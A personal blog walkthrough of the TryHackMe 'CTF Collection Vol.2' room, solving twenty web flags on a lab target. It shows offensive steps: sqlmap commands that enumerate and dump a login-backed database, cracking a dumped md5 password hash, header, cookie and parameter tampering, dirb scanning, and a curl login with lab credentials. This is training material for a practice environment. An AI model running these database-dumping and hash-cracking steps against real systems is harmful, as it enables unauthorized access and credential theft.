christopher di-nozzi

---

TryHackMe Walkthrough - CTF Collection Vol.2

Egg-cellent room!

25/01/2021

Time for a bit more of a challenge with our first medium room walkthrough! Before doing this room, I'd suggest you get comfortable with Burp or ZAP as I won't go into much detail about how to use them. You can check the room out here created by DesKel.

Easter 1

A good place to start is /robots.txt. If we head over there, we'll see a string of hex. Decode it and you've got flag 1!

Easter 2

There's also a resource in /robots.txt but it's all gibberish! Visiting it produces nothing either! Maybe we can decode it? If we decode it from base64->url decode->remove spaces->from base 64 again->remove spaces again-> from base64 again we have a more normal looking string. If we visit that page we'll get our flag in the source code! You can also find it by selecting all the text on the page using "ctrl+a".

Easter 3

This one was a freebie! I found it in the source code of /login!

Easter 4

Save a request sent to the login page via ZAP or Burp. I saved the request as "login.raw". Then use that in an sqlmap attack to enumerate databases.

sqlmap -r login.raw --dbs

Then dump the "THM_f0und_m3" database.

sqlmap -r login.raw -D THM\_f0und\_m3 --dump

Note: This might take some time.

Easter 5

This one is directly connected to Easter 4. When you dumped the "THM_f0und_m3" database, another table should have been dumped called "user". This has an md5 hash that stores the login password for Deskel. Crack the hash and login at /login to get the flag.

Easter 6

You can find this flag in the response header of the landing page. Check it out using a tool like ZAP.

Easter 7

Using inspect element, I modified the cookie value of "invite" to "1". After refreshing the page I could find the flag on the page.

Easter 8

Using ZAP, I resent a request to "index.php" and modified the "User-Agent" to:

Mozilla/5.0 (iPhone; CPU iPhone OS 13\_1\_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1

I could then find the flag in the response!

Easter 9

This flag could be found in the source code of /ready, just be sure to view it before the page redirects!

Easter 10

Intercept a request to /freesub and modify the referrer to "tryhackme.com."

Easter 11

Find the drop down menu about half way down the page between the man looking at the food and the big red button. We're gonna tamper with the request to change the "dinner" variable to "egg" because this guy loves eggs! The POST variables will look like:

dinner=egg&submit=submit

Then we can find the flag in the response!

Easter 12

Fake JS file, "jquery-9.1.2.js" has a function called "ahem" which we can call from the console by running "ahem()". You should be able to access the console via inspect element.

Easter 13

Press the button!

Task 14

There was a base64 encoded image in the source code of the page. By putting it in CyberChef we can convert it into an actual image and get the flag!

Easter 15

Go to /game1 and decode characters. Cheat sheet below.

a=89
b=90
c=91
d=92
e=93
f=94
g=95
h=41
i=42
j=43
k=75
l=76
m=77
n=78
o=79
p=80
q=81
r=10
s=11
t=12
u=13
v=14
w=15
x=16
y=17
z=18

A=99
B=100
C=101
D=102
E=103
F=104
G=51
H=52
I=53
J=54
K=55
L=56
M=57
N=58
O=126
P=127
Q=128
R=129
S=130
T=131
U=136
V=137
W=138
X=139
Y=140
Z=141

1=23
2=24
3=25
4=26
5=10
6=11
7=12
8=13
9=14
0=22

Easter 16

Using ZAP, I could modify a request to submit all 3 buttons at the same time! This responded with the flag! The payload will look like:

button1=button1&button2=button2&button3=button3&submit=submit

Easter 17

I tried to use cyberchef for this but had some issues, so I used RapidTables instead.
Bin->Dec->Hex->ASCII

Easter 18

Add to the request header:

egg:Yes

You'll have to scroll down the response a bit to find the flag.

Easter 19

Run a dirb scan, you should find a directory called /small with the flag inside!

Easter 20

Send POST request to landing page with the creds found at the bottom at the page. We can do this with curl by running:

curl -X POST -F 'username=DesKel' -F 'password=heIsDumb' http://10.10.192.159

The flag will be in the response!

Conclusion

A real mix of challenges which I really enjoyed! Some came easy, others not so much! I hope this guide is useful in cracking some of the trickier challenges!